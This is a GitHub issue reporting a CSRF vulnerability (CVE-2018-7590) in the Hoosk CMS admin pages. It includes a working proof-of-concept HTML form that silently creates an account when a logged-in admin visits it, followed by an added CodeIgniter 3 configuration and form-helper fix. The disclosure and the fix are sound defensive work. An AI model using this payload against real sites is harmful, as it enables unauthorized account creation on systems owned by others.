havok89 / Hoosk

Hoosk Codeigniter CMS
http://hoosk.org

CSRF issue that allows attacker to create an account #45

Closed fvi-att closed 4 years ago

fvi-att commented 6 years ago

Hello. I want to report that it has a CSRF issue in the admin pages. When an attacker induces an authenticated admin user to visit a malicious web page, an account will be created without the admin user's intention.

Here is how to reproduce the issue.

  1. Log in to the admin page (/admin).
  2. Stay logged in and access an HTML page with the following content:

    <html>
    <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://your.content.example.com" method="POST">
      <input type="hidden" name="username" value="test1" />
      <input type="hidden" name="email" value="test1&#64;example&#46;com" />
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="con&#95;password" value="test" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
  3. An account with username = test1 is created without the admin user's intention.
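As an added example, not code from the Hoosk project or from the issue reporter: the CodeIgniter 3 settings and form-helper usage that close this class of bug, assuming Hoosk runs on CodeIgniter 3.x with the form helper loaded (the token names, view path and `admin/users/add` route are placeholders, not Hoosk's real ones).

```php
<?php
// --- application/config/config.php (CodeIgniter 3.x; added example) ---
// With csrf_protection FALSE, any POST to /admin is honoured regardless of
// the page that submitted it; that is the condition the hidden form above
// relies on.
$config['csrf_protection']   = TRUE;   // was FALSE: enable the built-in check
$config['csrf_token_name']   = 'hoosk_csrf_token';   // placeholder names,
$config['csrf_cookie_name']  = 'hoosk_csrf_cookie';  // not Hoosk's real ones
$config['csrf_expire']       = 7200;    // token lifetime in seconds
$config['csrf_regenerate']   = TRUE;    // fresh token on every request
$config['csrf_exclude_uris'] = array(); // leave nothing under /admin excluded
// CodeIgniter now compares the POSTed token field with the csrf cookie using
// a constant-time comparison (double-submit cookie pattern). A cross-site
// page cannot read the cookie, so the forged POST is rejected with a 403.
// Only POST requests are checked, so state-changing admin actions must not
// be reachable via GET.

// --- application/views/admin/user_form.php (placeholder path) ---
// form_open() emits the hidden token field automatically once the feature is
// on; a literal <form> tag does not, and would silently stay exploitable.
// Assumes $this->load->helper('form') was called in the controller.
echo form_open('admin/users/add');             // placeholder route
echo form_input('username', '');
echo form_input('email', '');
echo form_password('password', '');
echo form_password('con_password', '');
echo form_submit('submit', 'Save');
echo form_close();

// A hand-written <form> must echo the token explicitly, for example with
// form_hidden() using the names the Security class expects:
echo form_hidden(
    $this->security->get_csrf_token_name(),
    $this->security->get_csrf_hash()
);
```

A quick check after deploying: replaying the reporter's PoC form should now yield a 403 from CodeIgniter's Security class instead of a new user row.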
fvi-att commented 6 years ago

CVE-2018-7590 is assigned.